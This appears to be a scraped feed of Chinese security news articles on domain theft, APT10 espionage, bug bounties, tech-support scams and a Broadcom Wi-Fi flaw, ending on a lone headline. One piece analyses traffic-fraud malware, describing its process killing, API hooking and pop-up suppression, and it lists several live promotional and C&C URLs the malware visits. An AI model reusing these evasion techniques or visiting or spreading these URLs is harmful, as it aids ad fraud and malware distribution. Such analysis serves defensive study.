世界数据档案馆使用北极矿井存储数据免受世界末日影响

挪威着名的末日种子库正在得到一个新邻居,它被称为“北极世界档案馆”,其目的类似于末日种子库,在北极冻土带中提供一个遥远的,坚不可摧的家园,让存在在其中的数据免受受自然灾害和全球冲突等威胁。

虽然全球种子库由希望保护全球作物多样性的慈善机构资助,但世界档案馆是由挪威科技公司Piql和挪威国有矿业公司SNSK创立的营利性企业。档案馆今年3月27日开放,巴西,墨西哥和挪威政府成为第一批客户,将各种历史文件的副本存入保险库。

这些数据存储在由Piql专门为此任务开发的光学胶片中,具体来说,将PDF,JPG,TIFF等文件转换成大的高密度QR代码,然后采用Piql专有的胶片格式来存储这些高密度QR代码。

一旦数据完成在胶片上的存储,一卷胶片轴就存储在斯瓦尔巴北极群岛废弃的矿井当中。这些矿井最初由SNSK运营,用于采煤,但在1995年被放弃。矿井存储数据地方距地面300米,不受核攻击和环境管理计划的威胁。

Piql声称其专有的胶片格式将在矿井气候的帮助下安全存储数据至少500年,也许长达一千年,无需任何能量来维持存储温度。矿井深处储存温度为零下5度,极其干燥,是长期储存胶片的完美地点。

0day

总值千万的63个域名一夜被盗 还被贱卖甚至无偿转送

近年来,互联网域名价值逐年走高,部分投资者通过炒卖域名获益丰厚。日前,东莞网络从业者刘先生名下63个域名一夜之间被盗,随后部分域名被转卖。刘先生自称,按照当前市场价值,他的失窃域名总价值过千万元。令当事人困惑的是,由于互联网域名交易全部实行电子账户交易,谁掌握了账户密码和注册登记的个人信息,谁就可以将之出售,这让他无法寻求有效的途径追回资产。
有关专家认为,互联网域名失窃时有发生,包括国内一些知名网站,一旦失窃维权困难重重。由于至今没有绝对成熟的技术可以防范,因此,除了所有人灵活机动地进行安全设置之外,也建议交易平台修改交易规则。

域名失窃当天,刘先生曾收到平台推送的多条交易提示短信 (图片来源:广州日报)

噩耗:千万资产一夜失窃

刘先生是东莞一名票务网站工程师。十余年来,他通过自己对互联网域名市场的认知,购入了63个域名。刘先生说,按照当下市场行情,这些域名总价值过千万元。曾有不少人出价向刘先生购域名,但是他却一个也没卖过。“因为好记、符号组合简单的域名属于稀有资产,价格只涨不跌,所以不打算卖。”刘先生说。但让他没想到的是,这笔稀有资产一夜之间蒸发了。
本月8日下午,他收到一条短信提醒:“有人试图进入域名账户,如果不是本人,请加紧注意。”刘先生告诉记者,多年来总是有一些人试图侵入自己的账户,但是此前从来没有成功过,因此起初他并没有心生警惕也没想过采取改设密码等临时防范措施。

第二天上午,一个圈内朋友来电质问,“你怎么回事?把域名全部挂出来卖?”朋友的质问,让他瞬间感到事情不妙,于是立马登录账户,但无论自己怎么输入密码都是错的。刘先生说,这表明黑客已经成功破解了账户密码并且进行修改。而他作为63个域名的合法拥有者,却完全对账户失去了控制。

“我当时真的差点晕倒。对账户失去了控制,意味着盗窃者可以把我的资产转卖,或者用于色情网站、赌博平台等等违法途径。”精通互联网运行规则的刘先生告诉记者,这十多年来,自己几乎把所有的投资资金都放在了上面。这些域名除了一次性购入要花大量资金之外,每年还要花一大笔管理费、维护费等等。

忧心:维权之路一波三折

事件发生后,刘先生致电自己的域名注册管理机构“易名中国”,如实告知失窃情况,要求对方查明情况,并且立即采取措施冻结域名资产。

域名已被低价售出5个

然而平台方客服人员的回复让刘先生感到痛苦不堪。失窃仅一天,63个域名已经被售出五个,其中售价最高的仅五千元,还有无偿转送的情况。

“这是故意贱卖,这五个域名其中有几个价值近百万元,早有人出价购买,我没有答应。”刘先生向记者出示了一些企业和机构以前开出的报价。记者看见,曾有买家为这几个域名分别报价10万元~150万元不等。

对于五个域名的去向,刘先生推断盗窃者只是先将域名划归到别人的手中,再进行其他目的。

冻结账号得先证明非本人所为

按照域名管理平台的惯例,如果没有被转卖,刘先生只需要提供身份证资料,可以申请冻结账户,等待平台方核实所有人身份之后就可以恢复权利。而被卖出去了,解决起来非常麻烦。

接下来,刘先生持续不断与平台方交涉,要求对方冻结剩余的58个代售账号。“对于已经售出并且变了持有人的五个账户,我要求他们宣布交易无效,并归还给我。”

然而交易平台方客服人员在查了相关资料之后告诉他一个难以接受的现实,因为售卖人使用的是刘先生本人的身份证资料,只不过收取交易资金的银行账户是别人。也就是说交易记录显示是他本人所为,如果要推翻交易,宣布交易无效,必须出具可靠的法律手续。否则,平台方只能认定是刘先生本人所为。

“我的资产被盗卖了,我本人不知情,这已经足够了。盗窃者偷了我的账户,肯定只能以我的名义卖出。”刘先生难以理解平台方面的解释,他认为对方有管理责任,不应该将责任推给受害者。

而平台方面则告诉他,售卖者掌握了账户密码,同时也出具了刘本人留下的身份证影印件等资料,这是符合交易程序的,所有的域名交易都是这样执行的,是刘本人泄露自己的账户密码和个人信息,给了黑客以可乘之机,平台方并没错。

如何证明?得公安机关立案

在刘先生的申请之下,平台方暂时冻结未售出的58个域名。但刘先生要取回这些域名所有权,必须得证明不是自己所为。平台方告诉他,唯一的合法证明是公安机关的立案受理。

当天下午,刘先生走进了公安部门报案。在听取了事情经过之后,警方表示需要讨论之后才能决定是否立案。至今已有20天时间,李先生仍然处于等待之中。

焦点争议:

1、域名失窃之责谁来背?

根据刘先生的描述,记者联系上了总部设在厦门的易名中国有限公司,这是一家专业互联网域名拍卖、维护、注册代理、交易以及其他技术类的平台公司。对于刘先生的遭遇,工作人员表示他应该第一时间报案,由警方出面掌握情况最具有可信度。除此之外,其他途径都不会是好的办法。这位人员表示,域名被倒卖首先责任依然在于所有人自己,因为黑客要想成功盗取并且转卖域名,必须掌握账户密码、获取所有人注册登记留存的证件资料、手机验证码等等。

在域名交易中有一个重要环节不容绕开,就是平台方在办理账户更名之前,会根据原所有人留下的手机号发送验证码,待到记住确认之后,才会办理“过户登记”。

对于这道最后的安全闸门为何失守?刘先生的解释是“黑客既然掌握了账户密码,侵入之后修改手机联系方式自然是举手之劳,否则还做什么黑客?” 刘先生因此质疑平台方交易安全系统有漏洞。

2、失窃损失如何追讨?

东莞律师唐胜利认为,刘先生追讨失窃域名可选择两种途径,一是报警通过警方追查。二是根据《物权法》一百零六条、《合同法》一百零七条的相关规定,直接起诉域名交易平台把关不严,没有尽到审查交易人身份的责任,或者说在交易模式上留下了漏洞,导致盗窃者有机可乘,从而给域名所有权人带来经济损失。上述律师认为,根据刘先生的说法,还可以同时起诉持有刘先生失窃的五个域名的当前持有人。由于被售出的五个域名价格明显低于市场正常价值,已经显示现持有人不属于善意取得域名的使用权,有义务返还域名并赔偿损失。

然而,东莞市警方一位不愿意透露姓名的人士认为,域名属于无形资产,其价值纯粹属于买卖双方自行约定,因此警方很难定价。在现实中,这类案件警方立案受理的情况并不多见。同时,据另一位不愿透露姓名的法律界人士表示,域名被盗窃或者被盗卖的情况时有发生,不过通常为企业界在正常使用之中出现,对此不需要警方立案,只需要所有人通过申诉,在自己的权利被注册和管理机构确认之后就会被恢复权利。而刘先生这种批量收购、囤积持有,并没有用于正常的生产经营而被盗的情况,尚不多见,至今也没有警方出面追讨的先例。

域名被盗并不鲜见

实际上,域名倒卖在业内人士看来,是一种常见现象。在网上输入域名倒卖的关键词,会弹出数十万条类似信息。有专业网友们总结,具有升值空间的域名,例如容易记住、输入方便、或者与一些大企业大机构名称关联性较高的域名,常常是黑客重点光顾的对象。

遭遇被盗的域名,并非只有留在炒家手中的待营运域名,一些大众熟知的互联网域名被盗也是常见之事。其中不少更是属于知名企业,尤其是人气高的网站,如大众点评网和土豆网等都有过失窃的遭遇。而黑客盗取域名之后通常有两种企图,一种是盗取人气高、知名度大的域名之后,向域名的“主人”索取赎金。另一种就是冒充所有人直接转卖,前一种对于所有人来说仅仅损失金钱,后一种情况处理起来则更加麻烦。

如何保护域名?

真实填写个人信息

网络安全知名人士“爱秦皇岛”等人认为,要保护自己域名,首先域名注册要求个人信息必须真实正确,所有的交易平台都有一个规定,填写个人信息不审查,但是一旦发现虚假信息,例如身份证信息作假等,有权停用域名,被盗也不提供保护,甚至域名可能会被注销。

密码减少共用、定时修改

账户密码设置需要技巧,不要怕麻烦,一定要复杂。同时不要和其他互联网工具共用密码,间隔一段时间必须修改密码。密码设置上,只要规定许可,应该尽可能多地采用数字、字母、符号相组合。

如果发生了域名被盗,一般情况下有两种选择,报警或者走民事途径。由于互联网跨国和隐匿性强的现实原因,采取后者维权的比较多,因为互联网无论盗窃者在境内还是境外,互联网始终会有人使用,因此,找到使用人或者持有人不难。如果现持有者在国外,就得聘请其所在国或者地区的律师维权,这样维权效率会显著提升。0day

“简易下水道”:偷跑流量恶意软件分析

0×01前言

现今由于易语言的出现,中文编程的门槛越来越低,虽然很多人对此不屑一顾,但不得不说,这门语言的出现,大大降低了黑产行业的门槛。易语言编写简单,入门快,再加上各种易模块,使得简单几行代码就能实现一些强大的功能。据不完全统计,90%以上的游戏辅助和各类抢购软件都出自易语言开发,大量恶意程序也出自易语言之手。早在2011年亚洲反病毒大会上,微软工程师JIM就针对易语言程序的逆向进行了演讲,使得易语言程序的分析变得简单。笔者搜集了部分相关资料,通过对易语言程序结构的学习,分析了一款刷流量的恶意软件。

0×02运行效果

该程序伪装为IE图标,运行后窗口被隐藏起来,通过PCHunter把程序窗口隐藏属性去掉,效果如下图。

14909248492599.png!small

14909248602724.png!small

0×03基本流程

该程序的窗口在启动时被隐藏起来,通过定时器访问C&C地址,跳转到各类推广连接中。部分推广连接中包含有添加QQ群、下载文件和一些弹出窗口,该程序通过枚举窗口检查后,通过模拟点击关闭这些窗口。

14909248737893.png!small

0×04详细分析

该程序是易语言程序,通过分析易语言程序的结构得知,包含一个窗口、4个定时器、3个浏览器控件、一个选择框和一个编辑框。易语言窗口程序只需要分析它控件回调即可。

1.窗口初始化功能

该程序获取系统中的所有进程。

14909248846706.png!small

检查进程列表中是否有包含“qq”字符串的应用程序。

14909248967307.png!small

结束掉所有QQ进程。

1490924908167.png!small

InlineHook “waveOutWrite”、”midiStreamOut”、”DirectSoundCreate”、”InternetReadFile”这4个函数,让程序保持静音。

14909249777474.png!small

开启4个定时器,第一个定时器为5秒执行一次,后面3个定时器是随机时间

14909249901563.png!small

设置随机数种子,并取随机数

14909250641126.png!small

设置3个定时器随机时间间隔。

14909250789806.png!small

2.定时器1

使用易语言 超文本浏览框.跳转 对3个浏览器控件访问下面的URL,这些URL会随机访问各类推广网站,比如赌博、黄色、游戏推广、营销推广连接等。

http://www.sunshoo.com/10001.html

http://www.0571jihao.com/reyu.html

http://www.bangyuanhome.com

http://www.sunshoo.com/10002.html

http://www.0571jihao.com/eqsythjkl.html

14909250946635.png!small

3.定时器2

查找所有的QQ加群窗口。

14909251094469.png!small

枚举QQ加群窗口的所有子窗口。

14909251233232.png!small

检查子窗口的标题是否是如果“离开”或者“确定”

14909251411991.png!small

1490925153928.png!small

激活子窗口,通过发送按键消息,模拟点击空格键,关闭加QQ群的窗口。

14909251687894.png!small

1490925181782.png!small

同样的方法还对其他类似的弹出窗口进行模拟点击取消。

4.定时器3

清理IE缓存

14909258398735.png!small

14909252709715.png!small

5.定时器4

关闭所有QQ进程。

20.png

0×04总结

该程序结构清晰,在定时器访问C&C地址,跳转到各类推广链接中。部分推广连接中包含有添加QQ群、下载文件和一些弹出窗口,该程序通过枚举窗口检查后,通过模拟点击关闭这些窗口,使得用户无法察觉。但由于部分弹出窗口没有被及时关闭,使得自身浏览器控件被占用,系统便打开默认浏览器跳转到目标链接。最终变成每隔一段时间自动打开浏览器并跳转到广告页中。

 *本文作者:吃荤的驴子,转载请注明来自FreeBuf.COM0day

Android系统20万美元入侵计划无人问津,研究人员称奖金太少

p1200739-100709409-large.jpg

六个月前,Google发布了一项针对Android系统的入侵奖金计划,该计划提出只要有谁可以在仅知道受害者的电话号码和电子邮件的前提下远程侵入安卓设备,那么将会获得谷歌提供的20万美金的高额奖金。不过令人尴尬的是,该奖金计划至今无人问津。

虽然这听起来像是个好消息,像是证明了安卓系统足够的安全性。但是真的是因为这个原因,才导致的该计划遭人冷落吗?其实事实并非如此,早在该计划提出的初期就有人指出,20万美金的奖金实在太低,因此也不会有人愿意参与该入侵奖金计划。

一位用户在去年九月份在原公告下,如是回复:“如果可以实现像该入侵奖金计划说的那样,我觉得这个漏洞可以以更高的价格出售给其他公司或实体。”

另外一个人说:“许多买家可以支付远超这个金额的价钱,200K美金不值得我们在干草堆下去找针。”

迫于人们的说辞Google不得不被迫承认这一点,并在本周的一篇博文中指出,“考虑到要赢得这场比赛的bug类型,我们的奖金可能真的太低了。”据该公司的安全团队说,之所以人们对于该奖金计划缺乏兴趣,原因可能是因为这些漏洞的高度复杂性,以及不规则的市场竞争导致的。

为了在Android设备上获得root或内核权限,攻击者必须将多个漏洞结合在一起利用。例如他们至少需要获取一个系统的缺陷,并利用该缺陷在该设备上远程代码执行,然后还需要一个特权提升漏洞来转义应用程序沙箱。

而根据官方公布的Android每月安全公告可以知道,Android并不存在所谓的特权提升漏洞。然而在Google这次的入侵奖金计划中却明确要求,参赛者不允许与目标用户产生任何过多形式的交互。这也就意味着,攻击者需要在没有用户点击恶意链接,访问恶意网站,或接收打开恶意文件等前提下,实现对目标安卓系统的成功利用。

这个规则大大限制了研究人员可以用来攻击设备的切入点。因此我们要找的第一个漏洞切入点,将不得不在位于操作系统的内置消息传递功能如SMS(短信服务)或MMS(彩信服务)上 – 它们都可能会受到蜂窝网络的攻击。

早在2015年的时候,移动安全公司Zimperium的研究人员,就曾在Android核心媒体处理库中发现了符合该类漏洞标准的,一个名为Stagefright的漏洞。攻击者只需简单的将特制的媒体文件存放到设备上,就可以成功利用。该漏洞在当时也引发了大范围的修补潮。

这样一来,攻击者只需向目标用户发送彩信(MMS),并且不需要再与他们产生任何其他的交互,就可以成功的利用攻击者的设备。

在该漏洞被曝出后,许多类似的漏洞也在Stagefright和其它一些Android媒体处理组件中被挖掘出来。为此Google更改了内置消息传递应用的默认行为,不再自动进行彩信的检索,因此对该漏洞的利用也几乎成为了不可能。

Zimperium的创始人兼董事长Zim Avraham在一封电子邮件中说道:“远程的,无交互的bug是非常罕见的,需要很多的创造力和复杂性。这些东西的价值也足以超过20万美金的奖金。

一家名为Zerodium的漏洞收购公司,也为远程Android越狱提供了20万美元的漏洞奖金,但他们并没有对用户的交互做限制。

让我们来思考一个问题,既然在黑市可以通过一些简单的攻击,就能获取相同甚至更多的金额,那么为什么还要设立如此高难度的攻击项目呢?

Google的Project Zero团队成员Natalie Silvanovich在博客中表示:“总的来说,这次比赛是一次学习经历,我们希望把我们学到的东西,放到Google的奖励计划和未来的比赛当中。”最后,该团队也希望安全研究人员能积极的提出他们的意见和建议。

虽然这次Google的入侵奖金计划失败了,但是不可否认Google多年以来所执行的许多成功的安全奖励计划,包括软件和在线服务。

作为厂商来讲,是不可能像那些网络罪犯或漏洞经纪人那样,以高价来收购那些安全漏洞的。而厂商的漏洞悬赏项目,也仅针对那些有责任心的安全研究人员所设立。

*参考来源 :networkworld,FB小编 secist 编译,转载请注明来自FreeBuf(FreeBuf.COM)0day

报告称中国黑客组织APT10发动全球规模最大的网络间谍活动

普华永道与BAE发布联合报告称中国黑客组织APT10发动全球范围内规模最大的持续性网络间谍行为-E安全

E安全4月5日讯 普华永道与BAE Systems(BAE系统公司,世界第三大军工企业)联合发布了一份名为《以云为跳板——新一轮持续性全球网络间谍活动》的报告,怀疑某个来自中国的黑客组织可能正是一系列针对托管服务供应商之攻击活动的幕后黑手,而其计划利用此类方式从托管服务商之客户手中窃取知识产权。

这一被称为APT10(也被称为石熊猫)的黑客组织利用自定义恶意软件与鱼叉式网络钓鱼攻击获取受害者系统的访问权。

一旦APT10渗透进网络,就会进行侦查确保在部署mimikatz(抓取Windows密码的工具)或PwDump(Windows密码破解和恢复工具)之前获取合法凭证,以从被感染的MSP中窃取额外的凭证、管理员凭证和数据。

MSP基础设施的共享特性成就了APT10的成功,允许黑客在MSP和客户端之间秘密活动——因而得名Cloud Hopper。

在顺利入侵之后,他们随即利用目标公司所掌握的凭证对其企业客户发动进一步攻击。

目前APT10利用这种攻击手段对美国、加拿大、英国、法国、瑞士、南非、斯堪的纳维亚、泰国、韩国、印度和日本等国家发动过网络攻势。

报告称中国黑客组织APT10发动全球规模最大的网络间谍活动 - E安全

APT10的攻击步骤手法

供应链的安全性一直被公认为安全体系中的最大弱点,特别是在2013年,攻击者曾经利用HVAC服务供应商作为跳板成功入侵了美国Target零售网络。就目前来看,APT10正在以更大的规模使用这种攻击方式。

ATP10攻击供应商并向全球各客户发动网络间谍活动

普华永道的网络安全实践部门与BAE Systems配合英国国家网络安全中心(简称NCSC)共同发现了该黑客组织的行迹。

这一间谍活动的规模只在2016年年末才有所体现,不过该间谍活动被认为是迄今为止全球范围内规模最大的持续性网络间谍行为之一。

普华永道与BAE Systems方面表示,APT10通过攻击外包IT托管服务供应商的方式,向其全球各客户发动间谍活动,并借此获得了前所未有的大规模知识产权与敏感数据。

报告称中国黑客组织APT10发动全球规模最大的网络间谍活动 - E安全

据称,该黑客组织曾于2014年进行过此类活动,并在2016年年初大幅提高活动规模,包括增加新的开发者与入侵操作人员以不断提升攻击能力。

APT10伪装成日本政府机构进行网络间谍活动

普华永道与BAE Systems方面表示,APT10已经从多家受害者企业中提取到大量数据,同时利用其它受到入侵的网络将这些数据隐藏在世界各地。

一系列日本组织机构亦被分别作为针对性打击对象,作为嫌疑最大的攻击方,APT10很可能将自身伪装成为日本政府方面的合法职能实体。

普华永道与BAE发布联合报告称中国黑客组织APT10发动全球范围内规模最大的持续性网络间谍行为-E安全

根据面向攻击时间以及所使用之工具与技术进行的取证分析,调查人员得出结论称,APT10可能设立于中国,但除此之外尚不清楚APT10背后的实际人员组成以及为何将矛头指向这些受害组织。

普华永道与BAE发布联合报告称中国黑客组织APT10发动全球范围内规模最大的持续性网络间谍行为-E安全

普华永道与BAE发布联合报告称中国黑客组织APT10发动全球范围内规模最大的持续性网络间谍行为-E安全

普华永道公司网络威胁检测与响应事务合伙人克里斯·麦康凯表示,这一间接性攻击方法的出现表明,各类组织机构有必要全面了解其可能面临的威胁,特别是来自供应链的威胁因素。

他解释称,这一存在巨大潜在影响结果的全球性黑客活动需要得到高度重视,这意味着世界各地的组织机构应该与其安全小组及供应商保持密切合作,共同检测网络中出现的关键性警告标志并确保具备合理的应对与自我保护能力。

普华永道公司网络安全合伙人理查德·崔恩则补充表示,通过多方共同努力,他们得以向全球各安全机构、托管服务供应商以及已知最终受害者发布了相关发现,以帮助其预防、侦测并应对此类攻击活动。如果单纯凭借其中一方,则他们根本无法发现这一新型间接性攻击活动。

目前英国国家网络安全中心(NCSC)和澳大利亚国家网络安全中心(ACSC)已经对所在国的企业发布相关安全告警。

下载《以云为跳板——新一轮持续性全球网络间谍活动》原文报告,解压密码为E安全网址。

E安全注:本文系E安全独家编译报道,转载请联系授权,并保留出处与链接,不得删减内容。联系方式:① 微信号zhu-geliang ②邮箱eapp@easyaq.com0day

为什么FBI的调查活动受制于安全企业的黑客研究?

E安全4月5日文 公开发布对于黑客活动的研究成果虽然能够有效提升网络安全企业的声誉,但同时却有可能扰乱联邦政府执法机构的相关活动,这一问题似乎仍有进一步恶化的趋势。

来自各大网络安全厂商的威胁情报报告往往包含大量信息(且多数公开发布)足以详尽到可以彻底打乱由政府主导的网络调查工作详尽,这已经过各行业专家、前任执法机构工作人员以及情报官员的证实。FBI网络部前任副主任詹姆斯-特雷纳(James Trainor)表示此类问题“每过几个月”就会出现一次。

特雷纳及其他多位官员在接受采访时拒绝透露具体企业与事件名称,但他们强调称此类问题的严重程度正在逐日增加。

为什么FBI的调查活动受制于安全企业的黑客研究?-E安全

FBI调查活动与企业黑客研究之间的矛盾分析(专家观点)

马克-库尔(Mark Kuhr)

Synack公司联合创始人兼前任美国国安局分析师马克-库尔(Mark Kuhr)解释称,目前安全行业对于恶意活动与政府调查活动的分类还不够公平,而这也是造成当前状况的主要原因。如果能够及时得到消息,政府往往会要求安全厂商停止进一步披露。然而在大多数情况下,要么是政府对此毫不知情、要么是相关企业根本不打算予以理会。

约翰-雷吉(John Riggi)

FBI前任网络部外联主管约翰-雷吉(John Riggi)的证实,随着新兴资本与情报界的人才大量流入更具规模的网络安全行业,如今各安全厂商已经拥有更为强大的黑客活动追踪能力。目前已经有多家企业拥有足以同美国政府相抗衡的数据情报收集与分析水平。但由于当前还没有任何法规乃至其它形式的制度以指导各私营企业应何时及如何向私营公司披露其研究结果,因此部分事件的公开报道最终阻碍了正在进行的执法调查。

雷吉接受采访时表示,这种情况确实时有发生,尽管频率还不是很高,但他们曾经经历过多次由于特定白皮书与情报报告披露而导致调查工作被迫中断的状况。

不同私营网络安全企业在其动机、洞察能力、所面向客户以及与联邦政府间的协作关系等层面存在巨大差异。在某种程度上讲,这些因素都会影响到此类企业披露及发布相关研究结果的决定。

尼克-罗斯曼(Nick Rossman)

FireEye公司情报生成高级经理尼克-罗斯曼(Nick Rossman)表示,目前安全行业在发布任何威胁评估报告之前主要考量三大核心问题,分别为报告是否会对公众产生告知与影响效果、其是否会为其它研究工作提供情报价值以及是否会破坏或者以其它方式对合作伙伴追踪特定人员的能力产生负面影响。

罗斯曼进一步解释称,具体决策仍然受到其它因素的影响。每一家厂商都拥有自己的一套决策流程。而在正式报告出炉之前,FireEye公司的报告内容就已经被多个相关方所知晓。

总体来讲,执法机构当然不希望失去对目标的持续追踪能力。他们会尽可能将相关事项通知给CERT、政府、各执法机构以及来自世界各地的其它合作伙伴,从而保障各方间的沟通与合作。

FBI与黑客们存在的“矛盾”目前只能通过“私人关系”解决

黑客们经常受到政府与私营部门所使用之特殊技术方案、签名与工具的追踪。这些不同的取证学特征在广义上被称为违规指标,调查人员有时可以利用其判断特定攻击者以往与当前的恶意活动。黑客们对这一点也是非常清楚。

iSight公司间谍分析事务主管约翰-哈特奎斯特(John Hultquist)在接受采访时表示,各高级黑客集团(例如曾于2016年对美国民主党全国委员会进行入侵的攻击方)会定期监控网络安全公司发布的相关新闻报道与研究报告,并将此作为其应对活动的重要依据。

Rendition InfoSec公司联合创始人杰克-威廉姆斯(Jake Williams)解释称,如果针对特定黑客组织的IOC被披露在威胁情报报告当中,那么被点名的攻击者们往往会“修改其代码库以确保对应IOC无法起效”。

雷吉表示,他也曾经参与过一系列旨在解决此类问题的讨论,且对话中经常出现一些复杂难题。如果一家安全厂商发布的内容可能有助于企业客户但却会妨碍调查员的分析工作时,甚至往往会引发冲突。雷吉同样拒绝讨论具体的相关事件。

雷吉指出,一部分较为负责的大型企业至少会向FBI方面提供高级副本以作为提醒,但其中的内容往往并不全面,仅可作为基本参考。

然而,此类案例中的执法合作与盲目发布敏感资料之间仍然存在着细微的差别。

目前惟一能够阻止安全厂商发布可能导致调查类取证分析工作中断的威胁情报报告的举措,在于由私营企业网络安全人员与执法部门乃至美国情报界人士进行接触,但这种接触往往使用非正式性个人关系以及并不明确的人际对接网络。

特雷纳表示,这一切都取决于人际关系,而且完全取决于人际关系。

多位内部人士在接受采访时指出,各与联邦政府签订有业务合同并拥有曾任执法及情报职务之员工的网络安全企业一般更倾向于提前向政府方面提供通知。然而这种作法还远远没有成为行业标准,而且早期通知往往并不能阻止研究成果对于调查工作的影响。

为什么FBI的调查活动受制于安全企业的黑客研究?-E安全.jpg

研究成果披露与否,是个鱼和熊掌不可兼得的问题

研究成果披露或带动整个安全行业的技术能力进一步提升,但却无益于美国情报界。

位于弗吉尼亚州亚历山卓拉的网络安全企业Mandiant公司曾于2013年2月发布了一份关于APT1黑客集团的74页报告,该网络间谍组织据信由中国设立,且很可能由中国政府提供资助。当时Mandiant公司(目前已经成为FireEye的下辖子公司)在多份报告中提供了非常详尽的IOC,同时对APT1集团的黑客活动与操作方式进行了广泛概述。在不到一年时间内,美国司法部指责五名中国军方黑客入侵了美方计算机网络。这五名黑客目前仍驻留在中国国内。

尽管Mandiant公司当时曾经通知FBI称其即将发布APT1研究报告,但其它多家私营安全厂商证实称相关披露确实对美国政府追踪中国威胁活动者的能力产生了负面影响。APT1集团曾对多家不同企业及政府机构(包括非FireEye公司客户)构成严重威胁。

Area 1公司首席战略官、前任美国国安局计算机网络安全漏洞分析师布雷克-达奇(Blake Darche)解释称,该集团在Mandiant方面发布报告之后即彻底消失,且之后再未露面。

在APT1报告正式发布之前,其它多家安全厂商都有能力追踪到这批中国黑客。威廉姆斯表示,这些IOC资料在安全行业中得到了广泛分发。他同时指出,作为行业内第一家发表这项研究成果的企业,Mandiant公司确实借此实现了可观的竞争优势,他们在这批中国攻击者身上收集并整理到的情报确实远超其它厂商。

Mandiant公司的报告无疑有助于提升其自身业绩,同时亦为整个安全行业的入侵应对能力有所助益,然而美国情报界却因此遭受巨大损失。

威廉姆斯总结称,在这样的两难冲突当中,Mandiant公司如果选择放弃发布相关结果,亦会导致其它安全厂商陷入困境。

E安全注:本文系E安全独家编译报道,转载请联系授权,并保留出处与链接,不得删减内容。联系方式:① 微信号zhu-geliang ②邮箱eapp@easyaq.com0day

以色列网络防御企业数量居全球第二,仅次于美国

美国数据公司CB Insights最新发布的一份报告指出,以色列网络防御企业的数量位居全球第二,仅次于美国。报告列出了2017年网络安全创新中最具影响力的9大领域,以及30家拥有领先技术、并有潜力塑造未来网络安全格局的创业公司。

以色列网络防御企业数量居全球第二,仅次于美国-E安全

这份报告列出了2017年网络安全创新中最具影响力的9大领域,以及30家拥有领先技术、并有潜力塑造未来网络安全格局的创业公司。

这份报告基于量子加密、防欺诈安全、汽车安全、物联网安全、网络保险、移动安全、自主系统、关键基础设施安全和预测智能等多个方面对技术公司加以评估。

这份报告提到了3家以色列公司。

Argus公司迄今共融资3000万美元,该公司保护私家车和商用车免受网络攻击。总部位于特拉维夫的Indegy公司已融资1800万美元。报告称,该公司研发的软件可以保护重要的基础设施免受网络攻击。专注于网络保护和防欺诈技术的Illusive Networks公司共融资约3000万美元,投资方包括微软创投和柏尚投资。

这份报告还指出,2012-2016年网络防御企业最大的3家投资方分别是柏尚投资、谷歌风投和Accel Partners。

报告数据显示,网络安全创业公司在2012-2016年的1222笔风投交易中融资125亿美元。该领域的风投基金总额从2012年的13.2亿美元升至2015年的36.7亿美元,2016年又降至31亿美元,其中大部分交易集中在早期阶段的创业公司的种子轮或A轮融资。0day

“客服支持式骗局” 新鲜出炉,微软建议用户及时更新

在互联网,各种钓鱼和恶意广告骗局日益增多,其中一种知名类型的骗局就是“客服支持式骗局(Tech Support Scam)”,主要方式为诱使用户相信其电脑存在问题,并请求你跳转网页来“修复”电脑。微软近日发布博文详细介绍了几种常见骗局,并阐述了如何对付它们的方案,即“使用最新微软产品”

“客服支持式骗局” 新鲜出炉,微软建议用户及时更新-E安全.jpg

首先是常见的恶意骗局FakeBSoD类攻击,研究人员指恶意攻击者先在Google的AdWords上投得 YouTube这一热门关键字词,并让恶意广告置于搜索结果的最顶端显示。表面看起来广告将用户导向YouTube网站,然而当用户点击广告时,就会跳转到伪装成宕机或蓝屏的BSoD界面的网页,并诱使你通过客服热线电话来获取解决问题的方案,通常情况下通过进程管理杀掉浏览器进程就行了。若用户信以为真联络求助,就会掉进陷阱,被骗购买价钱由 199 至 599 美元不等的虚假支持服务,甚至还会被骗取个人资料和银行帐户等重要资料。

“客服支持式骗局” 新鲜出炉,微软建议用户及时更新-E安全.jpg

其次是TechBrolo类骗局,其页面会包含一个虚假的子浏览器地址栏页面,并在虚假浏览器的地址栏上显示官方的页面地址,诱使你通过客服电话联络协助解决问题。

“客服支持式骗局” 新鲜出炉,微软建议用户及时更新-E安全.jpg

Cusax骗局会弹出激活无效或者各种类似信息的对话框,诱使你拨打客服电话协助解决问题。

要解决这个问题怎么办呢?

当然是升级到最新的微软产品。升级至Windows 10,使用Microsoft Edge,并且保持Windows Defender的更新状态。

这就牵涉到Windows10利用击键记录器记录用户操作数据,为防止自己的击键记录被窃取的具体方式,参见E安全前段时间的文章

快禁用!Windows 10偷偷上传用户击键记录至微软服务器0day

固件安全值得关注:博通Wi-Fi芯片严重漏洞涉苹果三星等多家手机厂

谷歌旗下 Project Zero 安全研究人员发现了一个与博通(Broadcom)Wi-Fi 芯片有关、复杂且令人不快的Bug 。鉴于 Broadcom 为 iPhone、Nexus、三星等公司的多款设备供应 Wi-Fi 芯片,这一漏洞的影响非常之大。根据 Project Zero 研究员 Gal Baniamini 在博客上披露的详情:结合一系列漏洞手段,攻击者将可仅通过 Wi-Fi 设备且无需用户交互,即可发起攻击

博通Wi-Fi手机芯片存在严重漏洞,苹果、三星等用户请及时更新-E安全

简而言之,如果你与攻击者处于同一个 Wi-Fi 网络(比如一个公共热点),那它将在不被用户察觉的情况下轻易得逞。

受影响的手机型号,苹果用户请及时更新

Google Project Zero 用一部 Nexus 6P  智能机机型了演示,但这个问题其实影响所有使用 Broadcom Wi-Fi SoC 的设备。
这包括 Nexus 5 / Nexus 6、大多数三星旗舰设备、以及自苹果自 iPhone 4 之后的所有机型。
不过,博通(Broadcom )早已知晓此事,并与 Google 协力修复了这个问题,同时为受影响的厂商们制作了修补补丁。

针对此事,苹果在安全文件中称这项问题非常严重,范围内的一位攻击者能够在 Wi-Fi 芯片上执行任意代码。目前苹果已在 iOS 10.3.1 中修复了该问题,建议 iPhone 用户尽快升级。

固件安全性值得关注

Beniamini 写到:“尽管该 Wi-Fi 芯片上部署的固件及其复杂,但仍在安全性上有所欠缺”。“尤其是缺乏所有基本的漏洞缓解措施,包括堆栈 cookies、安全解链(safe unlinking)、以及访问权限保护(在一颗微处理器上)”。

目前,博通已在新版 SoC 中的微处理器(以及其它地方)部署了额外的硬件安全机制,此外他们正在考虑在未来版本的固件中部署防护措施”。0day

施耐德“不听劝”、不重视,工控设备固件仍在使用硬编码密码

